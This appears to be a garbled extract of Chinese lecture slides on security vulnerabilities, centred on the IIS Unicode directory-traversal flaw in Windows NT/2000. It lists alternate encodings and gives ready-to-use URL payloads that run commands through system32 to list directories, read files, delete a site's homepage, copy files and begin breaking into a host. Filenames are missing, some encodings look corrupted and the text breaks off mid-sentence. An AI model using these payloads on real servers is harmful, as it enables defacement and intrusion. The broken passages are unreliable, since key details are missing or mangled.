文档介绍:保障与安全攻击5漏洞
(4) 命名不当:允许两个不同的对象使用相同的名称,从而导致引用混乱。
(5) 存储单元重新分配或删除不当:一个过程把数据存放在内存中,随后把内存释放以重新分配,当此内存分配给另一个过程时,第二个过程就可以访列版本
Microsoft IIS + Microsoft Windows NT
消除该漏洞的方式是安装操作系统的补丁,只要安装了SP1以后,该漏洞就不存在了。微软IIS "/"和"\"而能利用"../"目录遍历的漏洞。
Date
17
(1)利用Unicode漏洞可以读取系统盘目录
(2)利用Unicode漏洞删除主页
(3)利用Unicode漏洞可以拷贝文件
(4)可以利用Unicode漏洞入侵系统
(5)可以上载文件(查看scripts目录可看上传是否成功)
入侵对方主机,建立用户
Date
18
Unicode漏洞
+SP6开始,还影响中文WIN2000+、中文WIN2000++SP1,台湾繁体中文也同样存在这样的漏洞。在NT4中/编码为“%c1%9c”或者“%c1%9c”,WIN2000英文版是“%c0%af”。
但从国外某些站点得来的资料显示,还有以下的编码可以实现对该漏洞的检测,该编码存在于日文版、韩文版等操作系统。
%c1%pc
%c0%9v
%c0%qf
%c1%8s
%e0%80%af
利用该漏洞读取出计算机上目录列表,比如读取C盘的目录,只要在浏览器中输入:“/..%c0%2f../winnt/system32/?/c+dir+c:\”
Date
19
Unicode漏洞
在Windows的目录结构中,可以使用两个点和一个斜线“../”来访问上一级目录,在浏览器中利用“scripts/../../”可以访问到系统盘根目录,访问“scripts/../../winnt/system32”就访问到系统的系统目录了,在system32目录下包含许多重要的系统文件,,可以利用该文件新建用户,删除文件等操作。
浏览器地址栏中禁用符号“../”,但是可以使用符号“/”的Unicode的编码。比如 “/scripts/..%c0%2f../winnt/system32/?/c+dir”中的“%c0%2f”就是“/”的Unicode编码。这条语句是执行dir命令列出目录结构。
Date
20
利用Unicode漏洞读取系统盘目录
Date
21
利用Unicode漏洞读取系统盘目录
利用语句得到对方计算机上装了几个操作系统以及操作系统的类型,。使用的语句是:
/..%c0%2f../winnt/system32/?/c+type+c:\
执行的结果如图所示。
Date
22
利用Unicode漏洞删除主页
利用Unicode可以方便的更改对方的主页,比如现在已经知道对方网站的根路径在“C:\Initpub\wwwroot”(系统默认)下,可以删除该路径下的文件“”来删除主页,这里的“”文件是IIS的默认启动页面。
使用的语句是:
/..%c0%2f../winnt/system32/?/c+del+c:\inetpub\wwwroot\
Date
23
利用Unicode漏洞删除主页
Date
24
拷贝文件
为了使用方便,,,使用的语句是:
/..%c0%2f../winnt/system32/?/c+copy+C:\winnt\system32\+
程序执行结果如图所示。
Date
25
查看C盘的目录
,比如查看C盘的目录,使用的语句就可以简化为:
?/c+dir+c:\
执行的结果如图所示。
Date
26
利用Unicode漏洞入侵系统
在地址栏上执行命令,用